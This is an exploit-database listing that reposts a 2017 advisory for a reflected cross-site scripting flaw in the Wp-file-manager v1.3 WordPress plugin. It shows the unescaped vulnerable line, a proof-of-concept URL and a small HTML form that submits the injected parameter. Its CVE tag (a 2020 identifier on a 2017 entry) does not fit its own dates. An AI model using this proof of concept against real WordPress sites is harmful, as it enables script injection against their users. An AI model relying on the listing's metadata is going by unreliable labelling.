Advertisement






Wp-file-manager v1.3 Cross Site Scripting

CVE Category Price Severity
CVE-2020-25213 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-12-08
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017120048

Below is a copy:

Wp-file-manager v1.3 Cross Site Scripting
###################################
# Exploit Title : Wp-file-manager v1.3 Cross Site Scripting
# Software dl : https://github.com/SergeyCherepanov/wp-file-manager
# Category : Webapps
# Author : Ali Alizadeh Asl (3p)
# Date : 7-12-2017
# Tested on : Win , KaLi_LiNuX
# Dork : N/A
# Telegram : @OverFear
###################################
Description :

XSS allows An Attacker to run Java Script codes.
###################################
Vulnerable page :

http://localhost:8080/wordpress/wp-content/plugins/wp-file-manager/index.php
###################################
Vulnerable source code :

line 20: echo $_REQUEST['id'];
###################################
PoC :

http://localhost:8080/wordpress/wp-content/plugins/wp-file-manager/index.php?id=[XSS]
###################################
Exploit :
<html>
<form action="http://localhost:8080/wordpress/wp-content/plugins/wp-file-manager/index.php" method="get">
<input type="text" name="id">
<input type="submit" value="XSS">
</form>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum